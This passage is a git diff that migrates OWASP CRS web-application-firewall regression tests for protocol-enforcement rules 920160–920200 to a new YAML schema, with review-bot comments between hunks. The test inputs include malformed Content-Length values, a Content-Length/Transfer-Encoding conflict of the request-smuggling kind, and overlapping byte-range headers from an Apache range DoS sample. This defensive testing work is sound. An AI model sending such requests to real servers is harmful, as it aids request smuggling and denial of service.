Host: "localhost" - Content-Type: "application/x-www-form-urlencoded" - Content-Length: "123x" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - uri: "/" - version: "HTTP/1.1" - output: - status: 400 + - input: + dest_addr: "127.0.0.1" + method: "POST" + port: 80 + headers: + User-Agent: "OWASP CRS test agent" + Host: "localhost" + Content-Type: "application/x-www-form-urlencoded" + Content-Length: "123x" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + uri: "/" + version: "HTTP/1.1" + output: + status: 400 - # Test is based in httpbin.org, so backend returns 405 if you are not posting to /post # Apache auto corrects for this error now so the log should not contain anything - test_title: 920160-4 + test_id: 4 desc: Content-Length HTTP header is not numeric (920160) from old modsec regressions stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - Accept-Language: en-us,en;q=0.5 - Content-Length: '3' - Content-Type: application/x-www-form-urlencoded - Host: localhost - Keep-Alive: '300' - Proxy-Connection: keep-alive - User-Agent: "OWASP CRS test agent" - method: POST - port: 80 - uri: /post - version: HTTP/1.0 - data: abc - output: - status: 200 - no_log_contains: id "920160" - - test_title: 920160-5 + - input: + dest_addr: 127.0.0.1 + headers: + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + Accept-Language: en-us,en;q=0.5 + Content-Length: '3' + Content-Type: application/x-www-form-urlencoded + Host: localhost + Keep-Alive: '300' + Proxy-Connection: keep-alive + User-Agent: "OWASP CRS test agent" + method: POST + port: 80 + uri: /post + version: HTTP/1.0 + data: abc + output: + status: 200 + no_log_contains: id "920160" + - test_id: 5 desc: Content-Length HTTP 
header is not numeric (920160) from old modsec regressions stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - Accept-Language: en-us,en;q=0.5 - Content-Length: "3;" - Content-Type: application/x-www-form-urlencoded - Host: localhost - Keep-Alive: '300' - Proxy-Connection: keep-alive - User-Agent: "OWASP CRS test agent" - method: POST - port: 80 - uri: / - version: HTTP/1.0 - data: abc - output: - status: 400 - # log_contains: id "920160" + - input: + dest_addr: 127.0.0.1 + headers: + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + Accept-Language: en-us,en;q=0.5 + Content-Length: "3;" + Content-Type: application/x-www-form-urlencoded + Host: localhost + Keep-Alive: '300' + Proxy-Connection: keep-alive + User-Agent: "OWASP CRS test agent" + method: POST + port: 80 + uri: / + version: HTTP/1.0 + data: abc + output: + status: 400 + # log_contains: id "920160" diff --git a/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920170.yaml b/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920170.yaml index 6b28cdc35..a8b9a1090 100644 --- a/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920170.yaml +++ b/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920170.yaml 
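Review bot: The explanatory comments on tests 1–3 (`# Non digit Content-Length without content-type`, `# Non digit content-length with content-type`, `# Mixed digit and non digit content length`) and the httpbin note on test 4 are deleted on the old side and not carried over, while the new schema's `desc:` is filled in only for tests 4 and 5. Move each removed comment into its test as `desc: "Non-digit Content-Length without Content-Type"`, `desc: "Non-digit Content-Length with Content-Type"` and `desc: "Mixed digit and non-digit Content-Length"` so the intent survives the format migration. Separately, none of the five output blocks asserts `log_contains: id "920160"` (test 5 has it commented out), so as written the file only checks that the server answers 400, which presumably comes from the web server's own header validation rather than from the CRS rule; if that is intentional, a `desc:` or comment saying so on tests 1–3 and 5 would stop the next reader from assuming 920160 itself is covered.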
@@ -1,122 +1,115 @@ --- meta: author: "csanders-git, azurit" - enabled: true - name: "920170.yaml" description: "A Selection of tests to trigger rule 920170" +rule_id: 920170 tests: - # POST Request with data (valid) - test_title: 920170-1 + test_id: 1 stages: - - stage: - input: - dest_addr: "127.0.0.1" - method: "POST" - port: 80 - headers: - User-Agent: "OWASP CRS test agent" - Host: "localhost" - Content-Type: "application/x-www-form-urlencoded" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - data: "hi=test" - uri: "/" - version: "HTTP/1.1" - output: - no_log_contains: "id \"920170\"" + - input: + dest_addr: "127.0.0.1" + method: "POST" + port: 80 + headers: + User-Agent: "OWASP CRS test agent" + Host: "localhost" + Content-Type: "application/x-www-form-urlencoded" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + data: "hi=test" + uri: "/" + version: "HTTP/1.1" + output: + no_log_contains: "id \"920170\"" - # GET request with data - test_title: 920170-2 + test_id: 2 stages: - - stage: - input: - dest_addr: "127.0.0.1" - method: "GET" - port: 80 - headers: - User-Agent: "OWASP CRS test agent" - Host: "localhost" - Content-Type: "application/x-www-form-urlencoded" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - data: "hi=test" - uri: "/" - version: "HTTP/1.1" - output: - log_contains: "id \"920170\"" + - input: + dest_addr: "127.0.0.1" + method: "GET" + port: 80 + headers: + User-Agent: "OWASP CRS test agent" + Host: "localhost" + Content-Type: "application/x-www-form-urlencoded" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + data: "hi=test" + uri: "/" + version: "HTTP/1.1" + output: + log_contains: "id \"920170\"" - # Head Request with data - test_title: 920170-3 + test_id: 3 stages: - - stage: - input: - 
dest_addr: "127.0.0.1" - method: "HEAD" - port: 80 - headers: - User-Agent: "OWASP CRS test agent" - Host: "localhost" - Content-Type: "application/x-www-form-urlencoded" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - data: "hi=test" - uri: "/" - version: "HTTP/1.1" - output: - log_contains: "id \"920170\"" + - input: + dest_addr: "127.0.0.1" + method: "HEAD" + port: 80 + headers: + User-Agent: "OWASP CRS test agent" + Host: "localhost" + Content-Type: "application/x-www-form-urlencoded" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + data: "hi=test" + uri: "/" + version: "HTTP/1.1" + output: + log_contains: "id \"920170\"" - # GET Request but content length is 0 and data is provided # Weird HTTP 1.0 support bug in Apache, without newline causes 408 - test_title: 920170-4 + test_id: 4 stages: - - stage: - input: - dest_addr: "127.0.0.1" - method: "GET" - port: 80 - headers: - User-Agent: "OWASP CRS test agent" - Host: "localhost" - Content-Type: "application/x-www-form-urlencoded" - Content-Length: "0" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - data: "hi=test\r\n" - stop_magic: true - uri: "/" - version: "HTTP/1.1" - output: - no_log_contains: "id \"920170\"" + - input: + dest_addr: "127.0.0.1" + method: "GET" + port: 80 + headers: + User-Agent: "OWASP CRS test agent" + Host: "localhost" + Content-Type: "application/x-www-form-urlencoded" + Content-Length: "0" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + data: "hi=test\r\n" + stop_magic: true + uri: "/" + version: "HTTP/1.1" + output: + no_log_contains: "id \"920170\"" - # GET request with content length 0 and no data. 
- test_title: 920170-5 + test_id: 5 stages: - - stage: - input: - dest_addr: "127.0.0.1" - method: "GET" - port: 80 - headers: - User-Agent: "OWASP CRS test agent" - Host: "localhost" - Content-Type: "application/x-www-form-urlencoded" - Content-Length: "0" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - data: "" - uri: "/" - version: "HTTP/1.1" - output: - no_log_contains: "id \"920170\"" - - test_title: 920170-6 + - input: + dest_addr: "127.0.0.1" + method: "GET" + port: 80 + headers: + User-Agent: "OWASP CRS test agent" + Host: "localhost" + Content-Type: "application/x-www-form-urlencoded" + Content-Length: "0" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + data: "" + uri: "/" + version: "HTTP/1.1" + output: + no_log_contains: "id \"920170\"" + - test_id: 6 desc: GET or HEAD Request with Body Content (920170) from old modsec regressions stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - Accept-Language: en-us,en;q=0.5 - Content-Type: application/x-www-form-urlencoded - Host: localhost - Keep-Alive: '300' - Proxy-Connection: keep-alive - User-Agent: "OWASP CRS test agent" - method: GET - port: 80 - uri: / - data: abc - version: "HTTP/1.1" - output: - log_contains: id "920170" + - input: + dest_addr: 127.0.0.1 + headers: + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + Accept-Language: en-us,en;q=0.5 + Content-Type: application/x-www-form-urlencoded + Host: localhost + Keep-Alive: '300' + Proxy-Connection: keep-alive + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: / + data: abc + version: "HTTP/1.1" + output: + log_contains: id "920170" 
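Review bot: Tests 1–5 lose their only human-readable identification: `test_title: 920170-1` becomes `test_id: 1` and the intent now survives only in the `#` comments above each entry, which a runner never prints, while test 6 carries a `desc:`. Moving each comment into the entry, e.g. `desc: "GET request with data"` under `test_id: 2` and `desc: "GET with Content-Length 0 but trailing data; Apache needs the newline or answers 408"` under `test_id: 4`, keeps the reason for each case visible in test output. Test 4's `data: "hi=test\r\n"` follows a request the server already considers complete (`Content-Length: "0"`), so its `no_log_contains` expectation appears to depend on the server silently discarding those trailing bytes; a sentence saying so would help anyone porting the case to a platform with different pipelining behaviour.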
diff --git a/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920171.yaml b/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920171.yaml index 7d515219a..c66ae836a 100644 --- a/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920171.yaml +++ b/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920171.yaml 
@@ -1,76 +1,72 @@ --- meta: author: airween - enabled: true - name: 920171.yaml description: "A Selection of tests to trigger rule 920171" +rule_id: 920171 tests: - # POST Request with data (valid) - test_title: 920171-1 + test_id: 1 stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - # this sends a chunked POST request with content "Hi CRS" in two lines - # POST / HTTP/1.1\r - # Accept: */*\r - # Host: localhost\r - # Transfer-Encoding: chunked\r - # User-Agent: "OWASP CRS test agent"\r - # \r - # 3\r - # Hi \r - # 3\r - # CRS\r - # 0\r - # \r - encoded_request: "UE9TVCAvIEhUVFAvMS4xDQpBY2NlcHQ6ICovKg0KSG9zdDogbG9jYWxob3N0DQpUcmFuc2Zlci1F\nbmNvZGluZzogY2h1bmtlZA0KVXNlci1BZ2VudDogTW9kU2VjdXJpdHkgQ1JTIDMgVGVzdHMNCg0K\nMw0KSGkgDQozDQpDUlMNCjANCg0K" - output: - no_log_contains: "id \"920171\"" + - input: + dest_addr: "127.0.0.1" + port: 80 + # this sends a chunked POST request with content "Hi CRS" in two lines + # POST / HTTP/1.1 + # Accept: */* + # Host: localhost + # Transfer-Encoding: chunked + # User-Agent: "OWASP CRS test agent" + # + # 3 + # Hi + # 3 + # CRS + # 0 + # + encoded_request: "UE9TVCAvIEhUVFAvMS4xDQpBY2NlcHQ6ICovKg0KSG9zdDogbG9jYWxob3N0DQpUcmFuc2Zlci1FbmNvZGluZzogY2h1bmtlZA0KVXNlci1BZ2VudDogTW9kU2VjdXJpdHkgQ1JTIDMgVGVzdHMNCg0KMw0KSGkgDQozDQpDUlMNCjANCg0K" + output: + no_log_contains: "id \"920171\"" - # GET Request with chunked data (invalid) - test_title: 920171-2 + test_id: 2 stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - # this sends a chunked GET request with content "Hi CRS" in two lines - # GET / HTTP/1.1\r - # Accept: */*\r - # Host: localhost\r - # Transfer-Encoding: chunked\r - # User-Agent: "OWASP CRS test agent"\r - # \r - # 3\r - # Hi \r - # 3\r - # CRS\r - # 0\r - # \r - encoded_request: "R0VUIC8gSFRUUC8xLjENCkFjY2VwdDogKi8qDQpIb3N0OiBsb2NhbGhvc3QNClRyYW5zZmVyLUVu\nY29kaW5nOiBjaHVua2VkDQpVc2VyLUFnZW50OiBNb2RTZWN1cml0eSBDUlMgMyBUZXN0cw0KDQoz\nDQpIaSANCjMNCkNSUw0KMA0KDQo=" - output: - log_contains: "id 
\"920171\"" + - input: + dest_addr: "127.0.0.1" + port: 80 + # this sends a chunked GET request with content "Hi CRS" in two lines + # GET / HTTP/1.1 + # Accept: */* + # Host: localhost + # Transfer-Encoding: chunked + # User-Agent: "OWASP CRS test agent" + # + # 3 + # Hi + # 3 + # CRS + # 0 + # + encoded_request: "R0VUIC8gSFRUUC8xLjENCkFjY2VwdDogKi8qDQpIb3N0OiBsb2NhbGhvc3QNClRyYW5zZmVyLUVuY29kaW5nOiBjaHVua2VkDQpVc2VyLUFnZW50OiBNb2RTZWN1cml0eSBDUlMgMyBUZXN0cw0KDQozDQpIaSANCjMNCkNSUw0KMA0KDQo=" + output: + log_contains: "id \"920171\"" - # HEAD Request with chunked data (invalid) - test_title: 920171-3 + test_id: 3 stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - # this sends a chunked HEAD request with content "Hi CRS" in two lines - # HEAD / HTTP/1.1\r - # Accept: */*\r - # Host: localhost\r - # Transfer-Encoding: chunked\r - # User-Agent: "OWASP CRS test agent"\r - # \r - # 3\r - # Hi \r - # 3\r - # CRS\r - # 0\r - # \r - encoded_request: "SEVBRCAvIEhUVFAvMS4xDQpBY2NlcHQ6ICovKg0KSG9zdDogbG9jYWxob3N0DQpUcmFuc2Zlci1F\nbmNvZGluZzogY2h1bmtlZA0KVXNlci1BZ2VudDogTW9kU2VjdXJpdHkgQ1JTIDMgVGVzdHMNCg0K\nMw0KSGkgDQozDQpDUlMNCjANCg0K" - output: - log_contains: "id \"920171\"" + - input: + dest_addr: "127.0.0.1" + port: 80 + # this sends a chunked HEAD request with content "Hi CRS" in two lines + # HEAD / HTTP/1.1 + # Accept: */* + # Host: localhost + # Transfer-Encoding: chunked + # User-Agent: "OWASP CRS test agent" + # + # 3 + # Hi + # 3 + # CRS + # 0 + # + encoded_request: "SEVBRCAvIEhUVFAvMS4xDQpBY2NlcHQ6ICovKg0KSG9zdDogbG9jYWxob3N0DQpUcmFuc2Zlci1FbmNvZGluZzogY2h1bmtlZA0KVXNlci1BZ2VudDogTW9kU2VjdXJpdHkgQ1JTIDMgVGVzdHMNCg0KMw0KSGkgDQozDQpDUlMNCjANCg0K" + output: + log_contains: "id \"920171\"" diff --git a/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920180.yaml b/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920180.yaml index 6af7fc1ac..f6c4546ec 100644 --- a/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920180.yaml 
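Review bot: The commented-out request in all three tests says `User-Agent: "OWASP CRS test agent"`, but the `encoded_request` base64 decodes to `User-Agent: ModSecurity CRS 3 Tests` — the hunk only re-joined the base64 fragments, it did not re-encode the request. Either re-encode the raw requests with the agent string the other test files send, or correct the comment so the documentation matches the bytes that actually reach the WAF. The rewrite also dropped the trailing `\r` from every comment line, which was the only hint that the encoded request is CRLF-terminated; a single line such as `# every line below is CRLF-terminated in the encoded request` would preserve that.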
+++ b/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920180.yaml 
@@ -1,83 +1,78 @@ --- meta: author: "csanders-git, azurit" - enabled: true - name: "920180.yaml" description: "Description" +rule_id: 920180 tests: - - test_title: 920180-1 + - test_id: 1 stages: - - stage: - input: - dest_addr: "127.0.0.1" - method: "POST" - port: 80 - headers: - User-Agent: "OWASP CRS test agent" - Host: "localhost" - Content-Type: "application/x-www-form-urlencoded" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - data: "hi=test" - stop_magic: true - uri: "/" - version: "HTTP/1.1" - output: - log_contains: id "920180" - - test_title: 920180-2 + - input: + dest_addr: "127.0.0.1" + method: "POST" + port: 80 + headers: + User-Agent: "OWASP CRS test agent" + Host: "localhost" + Content-Type: "application/x-www-form-urlencoded" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + data: "hi=test" + stop_magic: true + uri: "/" + version: "HTTP/1.1" + output: + log_contains: id "920180" + - test_id: 2 stages: - - stage: - input: - dest_addr: "127.0.0.1" - method: "POST" - port: 80 - headers: - User-Agent: "OWASP CRS test agent" - Host: "localhost" - Content-Type: "application/x-www-form-urlencoded" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - data: "hi=test" - uri: "/" - version: "HTTP/1.1" - output: - no_log_contains: id "920180" - - test_title: 920180-3 + - input: + dest_addr: "127.0.0.1" + method: "POST" + port: 80 + headers: + User-Agent: "OWASP CRS test agent" + Host: "localhost" + Content-Type: "application/x-www-form-urlencoded" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + data: "hi=test" + uri: "/" + version: "HTTP/1.1" + output: + no_log_contains: id "920180" + - test_id: 3 desc: POST request missing Content-Length Header (920180) from old modsec regressions stages: - - stage: - input: - 
stop_magic: true - dest_addr: 127.0.0.1 - headers: - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - Accept-Language: en-us,en;q=0.5 - Content-Type: application/x-www-form-urlencoded - Host: localhost - Keep-Alive: '300' - Proxy-Connection: keep-alive - User-Agent: "OWASP CRS test agent" - method: POST - port: 80 - uri: / - version: HTTP/1.0 - output: - log_contains: id "920180" - - test_title: 920180-4 + - input: + stop_magic: true + dest_addr: 127.0.0.1 + headers: + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + Accept-Language: en-us,en;q=0.5 + Content-Type: application/x-www-form-urlencoded + Host: localhost + Keep-Alive: '300' + Proxy-Connection: keep-alive + User-Agent: "OWASP CRS test agent" + method: POST + port: 80 + uri: / + version: HTTP/1.0 + output: + log_contains: id "920180" + - test_id: 4 desc: Ignore check of CT header if protocol is HTTP/2 stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - Accept-Language: en-us,en;q=0.5 - Content-Type: application/x-www-form-urlencoded - Host: localhost - Keep-Alive: '300' - Proxy-Connection: keep-alive - User-Agent: "OWASP CRS test agent" - method: POST - port: 80 - uri: / - version: HTTP/2.0 - output: - no_log_contains: id "920180" + - input: + dest_addr: 127.0.0.1 + headers: + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + Accept-Language: en-us,en;q=0.5 + Content-Type: application/x-www-form-urlencoded + Host: localhost + Keep-Alive: '300' + Proxy-Connection: keep-alive + User-Agent: "OWASP CRS test agent" + method: POST + port: 80 + uri: / + version: HTTP/2.0 + output: + no_log_contains: id "920180" 
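Review bot: Test 4 (the HTTP/2.0 exemption) does not set `stop_magic: true`, unlike test 3 which needs it so that no Content-Length header is injected for the POST; if the runner adds one here too, 920180 cannot fire regardless of the version string and the test passes for the wrong reason. Adding `stop_magic: true` to test 4's input makes the `version: HTTP/2.0` branch the property under test. The desc "Ignore check of CT header if protocol is HTTP/2" looks like a slip for the Content-Length header that test 3's desc names; `desc: "Missing Content-Length is not checked when the protocol is HTTP/2"` would match the rule.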
diff --git a/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920181.yaml b/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920181.yaml index af57064f1..c8f36e239 100755 --- a/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920181.yaml +++ b/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920181.yaml @@ -1,28 +1,26 @@ --- meta: author: "fgsch" - enabled: true - name: "920181.yaml" description: "Description" +rule_id: 920181 tests: - - test_title: 920181-1 + - test_id: 1 stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - method: "POST" - uri: "/anything" - headers: - Host: "localhost" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Content-Length: 7 - Content-Type: "application/x-www-form-urlencoded" - Transfer-Encoding: "chunked" - User-Agent: "OWASP CRS test agent" + - input: + dest_addr: "127.0.0.1" + port: 80 + method: "POST" + uri: "/anything" + headers: + Host: "localhost" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Content-Length: 7 + Content-Type: "application/x-www-form-urlencoded" + Transfer-Encoding: "chunked" + User-Agent: "OWASP CRS test agent" data: "7\x0D\x0Afoo=bar\x0D\x0A0\x0D\x0A\x0D\x0A" - stop_magic: true - output: - # Apache unsets the Content-Length header if Transfer-Encoding is found! - status: 200 - no_log_contains: id "920181" + stop_magic: true + output: + # Apache unsets the Content-Length header if Transfer-Encoding is found! + status: 200 + no_log_contains: id "920181" diff --git a/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920190.yaml b/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920190.yaml index 133323019..b4f29d6f0 100644 --- a/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920190.yaml +++ b/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920190.yaml 
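Review bot: In 920181.yaml the `data:` line is the only line of the stage shown as unchanged context while every sibling under `input:` is removed and re-added at the new indentation, which suggests it previously sat one level shallower (a key of the old `stage` mapping rather than of `input`, i.e. the chunked body was never attached to the request). After this change it is inside `input`, so the request carries `Content-Length: 7`, `Transfer-Encoding: chunked` and a real chunked body for the first time; the `status: 200` / `no_log_contains` expectation should be re-verified on a live Apache rather than carried over. If that reading is wrong, a comment above `data:` stating that it is the request body would still help, since a CL/TE conflict is exactly the smuggling shape this rule exists for. The file also keeps mode 100755; a test YAML does not need the executable bit.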
@@ -1,61 +1,57 @@ --- meta: author: "csanders-git, azurit" - enabled: true - name: "920190.yaml" description: "Description" +rule_id: 920190 tests: - - test_title: 920190-1 + - test_id: 1 stages: - - stage: - input: - dest_addr: "127.0.0.1" - method: "GET" - port: 80 - headers: - User-Agent: "OWASP CRS test agent" - Host: "localhost" - Range: "0-1" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - uri: "/" - version: HTTP/1.1 - output: - no_log_contains: id "920190" - - test_title: 920190-2 + - input: + dest_addr: "127.0.0.1" + method: "GET" + port: 80 + headers: + User-Agent: "OWASP CRS test agent" + Host: "localhost" + Range: "0-1" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + uri: "/" + version: HTTP/1.1 + output: + no_log_contains: id "920190" + - test_id: 2 desc: 'Range: Invalid Last Byte Value (920190) from old modsec regressions' stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - Accept-Language: en-us,en;q=0.5 - Connection: close - Host: localhost - Keep-Alive: '300' - Proxy-Connection: keep-alive - Range: bytes=0-,5-0,5-1,5-2,5-3,5-4,5-5,5-6,5-7,5-8,5-9,5-10,5-11,5-12,5-13,5-14,5-15 - User-Agent: "OWASP CRS test agent" - method: GET - port: 80 - uri: / - version: HTTP/1.1 - output: - log_contains: id "920190" - - test_title: 920190-3 + - input: + dest_addr: 127.0.0.1 + headers: + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + Accept-Language: en-us,en;q=0.5 + Connection: close + Host: localhost + Keep-Alive: '300' + Proxy-Connection: keep-alive + Range: bytes=0-,5-0,5-1,5-2,5-3,5-4,5-5,5-6,5-7,5-8,5-9,5-10,5-11,5-12,5-13,5-14,5-15 + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: / + version: HTTP/1.1 + output: + log_contains: id 
"920190" + - test_id: 3 desc: "Status Page Test - Request-Range header field with range end less than range start" stages: - - stage: - input: - dest_addr: "127.0.0.1" - method: "GET" - port: 80 - headers: - User-Agent: "OWASP CRS test agent" - Host: "localhost" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - Request-Range: bytes=64-0 - uri: "/" - version: "HTTP/1.1" - output: - log_contains: "id \"920190\"" + - input: + dest_addr: "127.0.0.1" + method: "GET" + port: 80 + headers: + User-Agent: "OWASP CRS test agent" + Host: "localhost" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + Request-Range: bytes=64-0 + uri: "/" + version: "HTTP/1.1" + output: + log_contains: "id \"920190\"" diff --git a/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920200.yaml b/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920200.yaml index 07c81eacd..5f3be3dc6 100644 --- a/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920200.yaml +++ b/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920200.yaml 
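Review bot: The negative case in test 1 sends `Range: "0-1"` without the `bytes=` unit, which is not a well-formed Range value; if the rule's expression expects the unit prefix, this case never reaches the first-byte/last-byte comparison and passes vacuously. `Range: "bytes=0-1"` would exercise the comparison with a valid header while still expecting `no_log_contains: id "920190"`. Whether the current value is deliberately malformed cannot be told from the hunk; a `desc:` on test 1 saying which it is would settle that.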
@@ -1,172 +1,161 @@ --- meta: author: "csanders-git, azurit" - enabled: true - name: "920200.yaml" description: "Description" +rule_id: 920200 tests: - - test_title: 920200-1 + - test_id: 1 stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - User-Agent: "OWASP CRS test agent" - Host: "localhost" - Range: "bytes=1-10,11-20,21-30,31-40,41-50,51-60" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - uri: "/" - version: "HTTP/1.1" - output: - log_contains: "id \"920200\"" + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + User-Agent: "OWASP CRS test agent" + Host: "localhost" + Range: "bytes=1-10,11-20,21-30,31-40,41-50,51-60" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + uri: "/" + version: "HTTP/1.1" + output: + log_contains: "id \"920200\"" - # Sample taken from https://github.com/alienwithin/php-utilities/blob/master/apache-byte-range-server-dos/apache_byte_range_server_dos.php - test_title: 920200-2 + test_id: 2 stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - User-Agent: "OWASP CRS test agent" - Host: "localhost" - Request-Range: "bytes=5-0,1-1,2-2,3-3,4-4,5-5,6-6,7-7,8-8,9-9,10-10,11-11" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - uri: "/" - version: "HTTP/1.1" - output: - log_contains: "id \"920200\"" - - test_title: 920200-3 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + User-Agent: "OWASP CRS test agent" + Host: "localhost" + Request-Range: "bytes=5-0,1-1,2-2,3-3,4-4,5-5,6-6,7-7,8-8,9-9,10-10,11-11" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + uri: "/" + version: "HTTP/1.1" + output: + log_contains: "id \"920200\"" + - test_id: 3 stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - User-Agent: "OWASP CRS 
